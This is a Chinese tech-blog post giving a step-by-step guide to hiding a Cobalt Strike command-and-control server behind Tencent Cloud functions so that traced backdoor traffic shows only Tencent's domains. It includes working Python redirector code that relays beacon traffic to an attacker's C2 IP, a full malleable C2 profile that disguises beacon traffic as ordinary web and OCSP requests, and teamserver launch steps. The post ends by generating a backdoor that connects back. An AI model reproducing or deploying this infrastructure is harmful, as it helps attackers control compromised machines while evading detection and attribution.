使用腾讯云函数隐藏C2

已于 2024-05-23 16:41:03 修改
阅读量724 收藏 4
点赞数 32
文章标签: 腾讯云 云计算
于 2024-05-23 16:40:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75387456/article/details/139149488
版权

基于CS,隐藏C2服务端比较常用的有:

域前置,走cdn域名,利用云函数

但是近几年域前置寸步难行,所以走CDN和利用云函数比较常见,

刚刚起步走了不少弯路,所以记录下来,希望可以帮到大家:


简介:
腾讯云云函数(Serverless Cloud Function,SCF),可以为企业和开发者提供无服务器执行环境,无需购买和管理服务器,只要在腾讯云上使用平台支持的语言编写核心代码并设置代码运行的条件,即可在腾讯云基础设施上弹性、安全地运行代码。

 

优点:

所有的流量都是通过腾讯云函数进行转发,因此溯源后门只能得到腾讯云的域名和IP,且云函数的服务器是自带 CDN 的,能够很好的隐藏我们的C2服务器。

原理 :

原理其实很简单,由第三方提供的服务接收C2客户端流量,转发给C2服务端,避免直接暴露服务端,所以第三方服务最好有以下优点:

  • 访问速度要快
  • 价格实惠
  • 主动提供cdn

本文以腾讯云+API网关为例

所需组件:

  • CS4.0以上版本
  • 腾讯云(能白嫖一年免费API网关)

创建云函数

  • 登录腾讯云,云产品 =》 云函数 =》新建

  • 选择从头开始

  • 将以下代码复制粘贴到云函数,以下代码中的C2修改为自己的服务器IP,点击完成

# coding: utf8
import json,requests,base64
def main_handler(event, context):
    response = {}
    path = None
    headers = None
    try:
        C2='http://45.xx.xx.45:80'
        if 'path' in event.keys():
            path=event['path']
        if 'headers' in event.keys():    
            headers=event['headers']
        if 'httpMethod' in event.keys() and event['httpMethod'] == 'GET' :
            resp=requests.get(C2+path,headers=headers,verify=False) 
        else:
            resp=requests.post(C2+path,data=event['body'],headers=headers,verify=False)
            print(resp.headers)
            print(resp.content)
        response={
            "isBase64Encoded": True,
            "statusCode": resp.status_code,
            "headers": dict(resp.headers),
            "body": str(base64.b64encode(resp.content))[2:-1]
        }
    except Exception as e:
        print('error')
        print(e)
    finally:
        return response


  • 创建触发器

  • 照这个修改

  • 点击API服务名对触发器进行配置
  • 将路径修改为【/】,然后点击立即完成

发布成功,到这里我们的云函数和触发器就配置成功了。
这里的公网域名就是我们下面要配置的cs主机:

配置cs
接下来就是配置cs,将以下代码保存为profile配置文件(不需要修改):
set sample_name "t";
set sleeptime "3000";
set jitter    "0";
set maxdns    "255";
set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";
http-get {
    set uri "/api/x";
    client {
        header "Accept" "*/*";
        metadata {
            base64;
            prepend "SESSIONID=";
            header "Cookie";
        }
    }
    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Server" "Nodejs";
        output {
            base64;
            print;
        }
    }
}
http-stager {  
    set uri_x86 "/vue.min.js";
    set uri_x64 "/bootstrap-2.min.js";
}
http-post {
    set uri "/api/y";
    client {
        header "Accept" "*/*";
        id {
            base64;
            prepend "JSESSION=";
            header "Cookie";
        }
        output {
            base64;
            print;
        }
    }
    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Connection" "keep-alive";
        output {
            base64;
            print;
        }
    }
}

将这个文件放在与teamserver同一目录下就可以


启动cs:
./teamserver IP 密码 tecent_cloud_func.profile

客户端登录设置监听
启动cs客户端,添加监听器,跟正常的监听器一样,只是把原来的服务器IP换成了腾讯云网关API的域名,也就是我们第二步创建API网关触发器得到的公网域名:

保存,生成后门进行测试。成功上线

雷宝SF
关注
  • 32
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
腾讯云无服务器云函数使用
01-06
腾讯云无服务器云函数使用函数函数是什么 云函数就是云供应商把底层的开发平台搭建好,我们可以直接编写函数代码放在云函数平台上,然后调用函数实现相应的功能。而不需要去考虑开发平台。它是由事件触发,...
腾讯云-云函数serverless-thinkphp6.0专用的入口文件.zip
06-08
下载后解压,将index.php和serverless.yml复制到安装好的THINKPHP6.0根目录,
利用腾讯云函数隐藏C2服务器
xiaokp7的博客
06-17 713
隐藏c2服务器
函数隐藏c2服务器
weixin_44747030的博客
01-15 8530
学习记录
函数隐匿C2服务器
m0_58687645的博客
03-04 7095
第一步,创建云函数 登录腾讯云平台,访问云函数功能链接:https://console.cloud.tencent.com/scf/list?rid=8&ns=default。点击新建,创建方式选择自定义创建。函数名称可以自定义进行设置,主要是函数代码部分,将下面内容复制到函数代码中: # -*- coding: utf8 -*- import json,requests,base64 def main_handler(event, context): C2='http://<C
函数实现隐藏c2地址
最新发布
milu_Sec的博客
12-30 508
说明:云函数是一个可以为开发者提供的无服务器执行代码的环境,相当于我们可以提前部署一个云函数,当我们需要运行这段代码的时候只需要通过去请求某一个特定的地址(即云函数地址)就可以运行了。最后,该函数将响应的状态码、标头和正文转换为一个 JSON 对象,并将其返回给调用方。配置代码写如下代码,c2地址填写 协议+ip+port,如http://127.0.0.1:80,本文使用80端口,所以后续使用http beacon。该函数的目的是将传入的 HTTP 请求转发到指定的 URL,并将响应返回给调用方。
【红队APT】反朔源隐藏&C2项目&CDN域前置&云函数&数据中转&DNS转发
今天是几号的博客
04-19 2350
区别于单纯的CDN隐藏IP技术;域前置技术采用高权重域名进行伪装,效果要更上一层楼!可以看到这里正常上线,也是简单的进行流量代理,这里我把上面的iptables转发配置清空了,避免干扰 注: 如果中转服务器被拿下的话,那么搜集信息很可能就可以发现请求重定向的痕迹,从而找到真实C2地址。 请求重定向也可以和之前的CDN方法相结合,之前CDN方法是通过CDN将请求转发到真实的C2服务器上,而添加请求重定向后,流程就变为了CDN转发到中转服务器,中转服务器再转到C2,达到双重隐藏的效果。
隐藏c2
weixin_45111459的博客
05-25 197
1.Ngrok 穿透反弹 shell 到 Metasploit 来源:https://mp 2.cdn隐藏c2 freenom.com 注册域名 cloudflare.com 注册cdn账号,更改解析即可 别忘了超级ping测试 注意 http port 端口只能设置成以下几个: 80,8080,8880,2052,2082,2086,2095 如果是 https 的监听端口只能设置成以下几个: 443,2053,2083,2087,2096,8443; 因为这是 Cloudfl...
函数(变相代理池)的三种常见利用
dzqxwzoe的博客
02-22 547
之前学到一些云函数的利用,感觉很有趣,于是借此篇来总结一下三种对云函数的简单利用方式。
腾讯云无服务器云函数架构精解
01-27
继虚拟机,容器技术,无服务器化成为新的行业热点,无...本次主要分享腾讯云无服务器云函数在技术实现上的挑战及架构实现原理。 主要从以下四个方面来分享一下无服务器云函数: 云函数的价值及使用场景 云函数架构原理
Crypto腾讯云函数SCF可用Python层
02-06
腾讯云函数中可用的Crypto层,环境是python3.6
腾讯云函数天气推送.zip
03-13
需要替换成自己的API
腾讯云SDK执行无服务云函数
08-31
腾讯文档并无该demo,遂自己写了一个共大家使用,亲测可用。使用腾讯云SDK3.0版本,执行无服务云函数
腾讯云函数所需的NodeJs服务包
03-19
腾讯云函数所需的NodeJs服务包
vue中使用腾讯云Im的示例
01-21
在vue中使用腾讯云Im 通信时,官方给出的文档及sdk提供的都是es5的写法。我们在vue中使用均需要用es6的方式来改写sdk的js文件及按自己所需要的业务调用对应的api就行了 对sdk的js文件改写 使用exports方法导出函数。...
微信小程序云开发之使用函数
10-16
主要为大家详细介绍了微信小程序云开发之使用函数,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
腾讯云函数 springboot
07-28
腾讯云的云函数是一种Serverless服务,也称为SCF(Serverless Cloud Function),它允许用户在腾讯云的基础设施上弹性、安全地运行代码,而无需购买云服务器和虚拟机。云函数支持所有主流的编程语言,包括Spring Boot。\[1\] 使用函数时,程序员只需要上传函数代码,其他底层资源都由腾讯云在云上进行管理。这种函数级别的资源管理结合了腾讯云的各种云能力,使得开发变得更加简单和高效。\[2\] 在使用函数时,还会有一个API网关作为云函数的主要入口。API网关提供了HTTP接口、参数校验、鉴权、限流、自定义域名、自动化文档等功能,为云函数提供了强大的支持。\[3\] 因此,如果你想在腾讯云的云函数使用Spring Boot,你可以将Spring Boot应用程序的代码上传到云函数中,并通过API网关来访问和管理你的应用程序。这样你就可以充分利用腾讯云的Serverless服务和云能力来运行和扩展你的Spring Boot应用程序。 #### 引用[.reference_title] - *1* *2* *3* [实操教学|用Serverless 分分钟部署一个 Spring Boot 应用,真香!](https://blog.csdn.net/youanyyou/article/details/125532137)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值